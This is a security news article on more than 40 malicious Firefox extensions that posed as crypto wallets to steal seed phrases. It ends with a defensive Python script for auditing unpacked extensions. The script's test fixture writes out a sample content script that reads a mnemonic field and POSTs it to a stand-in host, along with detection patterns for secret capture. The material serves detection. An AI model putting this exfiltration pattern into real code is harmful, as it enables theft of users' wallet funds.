40+ Malicious Firefox Extensions Target Crypto Wallets, Steal Assets!

Over 40 Malicious Firefox Extensions Discovered Targeting Cryptocurrency Users
Introduction to the Threat
Security researchers have identified more than 40 malicious browser extensions for Mozilla Firefox. The extensions are built specifically to compromise cryptocurrency wallets and put users' digital assets at risk of theft.
The Nature of the Malicious Extensions
According to Koi Security researcher Yuval Ronen, these deceptive extensions masquerade as legitimate wallet applications from popular platforms, including Coinbase, MetaMask, Trust Wallet, and others. The campaign appears to have been active since at least April 2025, with new malicious extensions surfacing in the Firefox Add-ons store as recently as last week.
Deceptive Tactics Employed
The malicious extensions have been observed to artificially enhance their credibility by generating hundreds of fake 5-star reviews, far exceeding the actual number of installations. This tactic creates a false sense of trust, luring unsuspecting users into downloading them.
Additionally, the attackers have employed branding strategies that mimic legitimate wallet tools, using identical names and logos to further deceive potential victims.
Technical Mechanisms of the Attack
Some of the malicious extensions were built from the code of legitimate open-source wallet projects: the attackers cloned that code and added functionality that captures wallet keys and seed phrases from targeted websites and sends them to a remote server. The rogue extensions also collect and transmit the victim's external IP address.
Unlike conventional phishing schemes that rely on fraudulent websites or emails, these extensions operate directly within the user’s browser, making them significantly harder to detect and block using standard security measures.
The Profile of the Threat Actor
The presence of Russian language comments within the source code, along with metadata from a PDF file retrieved from the command-and-control server, suggests that a Russian-speaking cybercriminal group is behind this operation.
Response from Mozilla
All identified malicious extensions, with the exception of MyMonero Wallet, have been removed by Mozilla. The company has announced the development of an “early detection system” aimed at identifying and blocking fraudulent cryptocurrency wallet extensions before they can gain traction and deceive users into revealing their credentials.
Best Practices for Users
To guard against such threats, users are advised to install extensions only from verified developers and to review them carefully, both before installing and afterwards, since an extension's behaviour can change after installation.
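The capture-and-exfiltrate behaviour described under "Technical Mechanisms of the Attack", and the advice above to review installed extensions, can be turned into a simple static audit. The script below is an added example, not code from the article or from Koi Security; it assumes an unpacked XPI directory, and the indicator patterns and sample extension are constructed for illustration.

```python
"""Audit an unpacked Firefox extension for the capture-and-exfiltrate pattern.
Assumed layout: an unpacked XPI directory with manifest.json and JS files. The
indicator patterns and the sample extension are constructed for this example,
not taken from the campaign in the article.
"""
import json
import pathlib
import re
import tempfile

# Constructed indicators: secret capture, outbound transfer, hard-coded remote URLs.
CAPTURE_RE = re.compile(r"\b(mnemonic|seed ?phrase|privateKey|secretKey)\b", re.I)
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b")
URL_RE = re.compile(r"https?://[^\s'\"`]+")


def audit_extension(ext_dir):
    """Return findings for one unpacked extension; 'suspicious' is the verdict."""
    root = pathlib.Path(ext_dir)
    manifest = json.loads((root / "manifest.json").read_text())
    findings = {"content_script_matches": [], "external_urls": [],
                "captures_secrets": False, "sends_data": False}
    # Which sites the content scripts are injected into (wallet pages are the concern).
    for cs in manifest.get("content_scripts", []):
        findings["content_script_matches"].extend(cs.get("matches", []))
    for js in root.rglob("*.js"):
        src = js.read_text(errors="ignore")
        findings["captures_secrets"] |= bool(CAPTURE_RE.search(src))
        findings["sends_data"] |= bool(EXFIL_RE.search(src))
        findings["external_urls"].extend(URL_RE.findall(src))
    # Verdict: reads secret-looking fields AND has a network call AND names a remote host.
    findings["suspicious"] = (findings["captures_secrets"] and findings["sends_data"]
                              and bool(findings["external_urls"]))
    return findings


def build_sample_extension():
    """Write a constructed extension that mirrors the described behaviour, for testing."""
    d = pathlib.Path(tempfile.mkdtemp())
    (d / "manifest.json").write_text(json.dumps({
        "manifest_version": 2, "name": "Sample Wallet", "version": "1.0",
        "content_scripts": [{"matches": ["*://*.wallet.example/*"], "js": ["content.js"]}]}))
    (d / "content.js").write_text(
        "const phrase = document.querySelector('#mnemonic').value;\n"
        "fetch('https://collector.invalid/upload', {method: 'POST', body: phrase});\n")
    return str(d)


if __name__ == "__main__":
    print(audit_extension(build_sample_extension()))
```

A hit on all three indicators is a reason to inspect the extension by hand, not a proof of malice; legitimate wallet extensions also handle seed phrases and talk to the network, so compare the remote hosts against the vendor's documented endpoints.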